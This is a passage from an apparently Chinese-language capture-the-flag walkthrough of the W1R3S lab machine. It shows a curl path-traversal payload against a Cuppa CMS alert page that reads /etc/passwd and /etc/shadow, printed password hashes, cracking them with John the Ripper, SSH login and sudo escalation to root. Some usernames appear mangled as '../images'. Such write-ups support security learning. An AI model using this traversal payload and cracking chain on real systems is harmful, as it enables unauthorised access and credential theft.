systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
../images:x:1000:1000:../images,,,:/home/../images:/bin/bash
sshd:x:121:65534::/var/run/sshd:/usr/sbin/nologin
ftp:x:122:129:ftp daemon,,,:/srv/ftp:/bin/false
mysql:x:123:130:MySQL Server,,,:/nonexistent:/bin/false
    </div>
</div>                                                                                                                                                                                                 
kali@kali:~/../images$ sudo curl --data-urlencode urlConfig=./../../../../../../../../etc/passwd http://192.168.19.177/administrator/alerts/alertConfigField.php | html2text
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  4413  100  4347  100    66   722k  11239 --:--:-- --:--:-- --:--:--  861k
Configuration:
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:
x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/
usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/
var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/
nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/
var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:
/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System
(admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/
nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time
Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd
Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:
systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:
105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/
syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false messagebus:x:106:
110::/var/run/dbus:/bin/false uuidd:x:107:111::/run/uuidd:/bin/false lightdm:x:
108:114:Light Display Manager:/var/lib/lightdm:/bin/false whoopsie:x:109:117::/
nonexistent:/bin/false avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/
avahi-autoipd:/bin/false avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-
daemon:/bin/false dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/
bin/false hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false pulse:x:117:
124:PulseAudio daemon,,,:/var/run/pulse:/bin/false rtkit:x:118:126:
RealtimeKit,,,:/proc:/bin/false saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false ../images:x:1000:1000:
../images,,,:/home/../images:/bin/bash sshd:x:121:65534::/var/run/sshd:/usr/sbin/
nologin ftp:x:122:129:ftp daemon,,,:/srv/ftp:/bin/false mysql:x:123:130:MySQL
Server,,,:/nonexistent:/bin/false

查看shadow文件

kali@kali:~/../images$ sudo curl --data-urlencode urlConfig=./../../../../../../../../etc/shadow http://192.168.19.177/administrator/alerts/alertConfigField.php            
<style>
    .new_content{
        position: fixed;
    }
    .alert_config_field{
        font-size:12px;
        background:#FFF;
        position:relative;
        border-radius: 3px;
        box-shadow: 0px 0px 5px rgba(0,0,0,0.2);
        overflow:hidden;
        position:fixed;
        top:50%;
        left:50%;
        width:600px;
        height:440px;
        margin-left:-300px;
        margin-top:-220px;
    }
    .alert_config_top{
        position: relative;
        margin: 2px;
        margin-bottom: 0px;
        border: 1px solid #D2D2D2;
        background: #4489F8;
        overflow: auto;
        color:#FFF;
        font-size: 13px;
        padding: 7px 5px;
        box-shadow: 0 0 2px rgba(0, 0, 0, 0.1);
        text-shadow: 0 1px 1px rgba(0, 0, 0, 0.2);
    }
    .description_alert{
        position:relative;
        font-size:12px;
        text-shadow:0 1px #FFFFFF;
        font-weight: normal;
        padding: 5px 0px 5px 0px;
    }
    .btnClose_alert{
        position:absolute;
        top: 4px; right: 2px;
        width:22px;
        height:22px;
        cursor:pointer;
        background:url(js/cuppa/cuppa_images/close_white.png) no-repeat;
        background-position: center;
        background-size: 13px;
    }
    .content_alert_config{
        position:relative;
        clear:both;
        margin: 2px;
        margin-top: 0px;
        height: 401px;
        padding: 10px;
        overflow: auto;
    }
</style>
<script>
        function CloseDefaultAlert(){
                cuppa.setContent({'load':false, duration:0.2});
        cuppa.blockade({'load':false, duration:0.2, delay:0.1});
        }
</script>
<div class="alert_config_field" id="alert">
    <div class="alert_config_top">
        <strong>Configuration</strong>:         <div class="btnClose_alert" id="btnClose_alert" onclick="CloseDefaultAlert()"></div>
    </div>
    <div id="content_alert_config" class="content_alert_config">
        root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::
daemon:*:17379:0:99999:7:::
bin:*:17379:0:99999:7:::
sys:*:17379:0:99999:7:::
sync:*:17379:0:99999:7:::
games:*:17379:0:99999:7:::
man:*:17379:0:99999:7:::
lp:*:17379:0:99999:7:::
mail:*:17379:0:99999:7:::
news:*:17379:0:99999:7:::
uucp:*:17379:0:99999:7:::
proxy:*:17379:0:99999:7:::
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
backup:*:17379:0:99999:7:::
list:*:17379:0:99999:7:::
irc:*:17379:0:99999:7:::
gnats:*:17379:0:99999:7:::
nobody:*:17379:0:99999:7:::
systemd-timesync:*:17379:0:99999:7:::
systemd-network:*:17379:0:99999:7:::
systemd-resolve:*:17379:0:99999:7:::
systemd-bus-proxy:*:17379:0:99999:7:::
syslog:*:17379:0:99999:7:::
_apt:*:17379:0:99999:7:::
messagebus:*:17379:0:99999:7:::
uuidd:*:17379:0:99999:7:::
lightdm:*:17379:0:99999:7:::
whoopsie:*:17379:0:99999:7:::
avahi-autoipd:*:17379:0:99999:7:::
avahi:*:17379:0:99999:7:::
dnsmasq:*:17379:0:99999:7:::
colord:*:17379:0:99999:7:::
speech-dispatcher:!:17379:0:99999:7:::
hplip:*:17379:0:99999:7:::
kernoops:*:17379:0:99999:7:::
pulse:*:17379:0:99999:7:::
rtkit:*:17379:0:99999:7:::
saned:*:17379:0:99999:7:::
usbmux:*:17379:0:99999:7:::
../images:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
sshd:*:17554:0:99999:7:::
ftp:*:17554:0:99999:7:::
mysql:!:17554:0:99999:7:::
    </div>
</div>  

john破解shadow

www-data以及../images文件是我们很感兴趣的，我们可以把他们拷贝下来，破解

字典跑不跑的出来，还是看运气

很幸运，很快就跑出来了

kali@kali:~/../images$ sudo vim hash                                                                                                                            
                                                                                                                                                                                                 
kali@kali:~/../images$ cat hash     
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
backup:*:17379:0:99999:7:::
list:*:17379:0:99999:7:::
irc:*:17379:0:99999:7:::
gnats:*:17379:0:99999:7:::
nobody:*:17379:0:99999:7:::
systemd-timesync:*:17379:0:99999:7:::
systemd-network:*:17379:0:99999:7:::
systemd-resolve:*:17379:0:99999:7:::
systemd-bus-proxy:*:17379:0:99999:7:::
syslog:*:17379:0:99999:7:::
_apt:*:17379:0:99999:7:::
messagebus:*:17379:0:99999:7:::
uuidd:*:17379:0:99999:7:::
lightdm:*:17379:0:99999:7:::
whoopsie:*:17379:0:99999:7:::
avahi-autoipd:*:17379:0:99999:7:::
avahi:*:17379:0:99999:7:::
dnsmasq:*:17379:0:99999:7:::
colord:*:17379:0:99999:7:::
speech-dispatcher:!:17379:0:99999:7:::
hplip:*:17379:0:99999:7:::
kernoops:*:17379:0:99999:7:::
pulse:*:17379:0:99999:7:::
rtkit:*:17379:0:99999:7:::
saned:*:17379:0:99999:7:::
usbmux:*:17379:0:99999:7:::
../images:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::

                                                                                                                                                                                                 
kali@kali:~/../images$ john hash                                                
Warning: detected hash type "sha512crypt", but the string is also recognized as "HMAC-SHA256"
Use the "--format=HMAC-SHA256" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
www-data         (www-data)     
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
computer         (../images)     
2g 0:00:00:01 DONE 2/3 (2022-11-26 02:46) 1.351g/s 2182p/s 2183c/s 2183C/s 123456..franklin
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

获得了密码

www-data (www-data)
computer (../images)

尝试ssh登录

kali@kali:~/../images$ sudo ssh ../images@192.168.19.177
The authenticity of host '192.168.19.177 (192.168.19.177)' can't be established.
ED25519 key fingerprint is SHA256:Bue5VbUKeMSJMQdicmcMPTCv6xvD7I+20Ki8Um8gcWM.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.19.177' (ED25519) to the list of known hosts.
----------------------
Think this is the way?
----------------------
Well,........possibly.
----------------------
../images@192.168.19.177's password: 
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.13.0-36-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

102 packages can be updated.
0 updates are security updates.

New release '18.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

*** System restart required ***
.....You made it huh?....
Last login: Mon Jan 22 22:47:27 2018 from 192.168.0.35
../images@../images:~$ ls
Desktop  Documents  Downloads  examples.desktop  ftp  Music  Pictures  Public  Templates  Videos
../images@../images:~$ whoami
../images
../images@../images:~$ uname -a
Linux ../images 4.13.0-36-generic #40~16.04.1-Ubuntu SMP Fri Feb 16 23:25:58 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

sudo提权

发现有有全部的权限

../images@../images:~$ sudo -l
[sudo] password for ../images: 
Matching Defaults entries for ../images on ../images.localdomain:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User ../images may run the following commands on ../images.localdomain:
    (ALL : ALL) ALL

直接提权到root，获得flag

../images@../images:~$ sudo /bin/bash
root@../images:~# whoami
root
root@../images:~# cd root
bash: cd: root: No such file or directory
root@../images:~# cd /root
root@../images:/root# ls
flag.txt
root@../images:/root# cat flag.txt
-----------------------------------------------------------------------------------------
   ____ ___  _   _  ____ ____      _  _____ _   _ _        _  _____ ___ ___  _   _ ____  
  / ___/ _ \| \ | |/ ___|  _ \    / \|_   _| | | | |      / \|_   _|_ _/ _ \| \ | / ___| 
 | |  | | | |  \| | |  _| |_) |  / _ \ | | | | | | |     / _ \ | |  | | | | |  \| \___ \ 
 | |__| |_| | |\  | |_| |  _ <  / ___ \| | | |_| | |___ / ___ \| |  | | |_| | |\  |___) |
  \____\___/|_| \_|\____|_| \_\/_/   \_\_|  \___/|_____/_/   \_\_| |___\___/|_| \_|____/ 
                                                                                        
-----------------------------------------------------------------------------------------

                          .-----------------TTTT_-----_______
                        /''''''''''(______O] ----------____  \______/]_
     __...---'"""\_ --''   Q                               ___________@
 |'''                   ._   _______________=---------"""""""
 |                ..--''|   l L |_l   |
 |          ..--''      .  /-___j '   '
 |    ..--''           /  ,       '   '
 |--''                /           `    \
                      L__'         \    -
                                    -    '-.
                                     '.    /
                                       '-./

----------------------------------------------------------------------------------------
  YOU HAVE COMPLETED THE
               __      __  ______________________   _________
              /  \    /  \/_   \______   \_____  \ /   _____/
              \   \/\/   / |   ||       _/ _(__  < \_____  \ 
               \        /  |   ||    |   \/       \/        \
                \__/\  /   |___||____|_  /______  /_______  /.INC
                     \/                \/       \/        \/        CHALLENGE, V 1.0
----------------------------------------------------------------------------------------

CREATED BY SpecterWires

----------------------------------------------------------------------------------------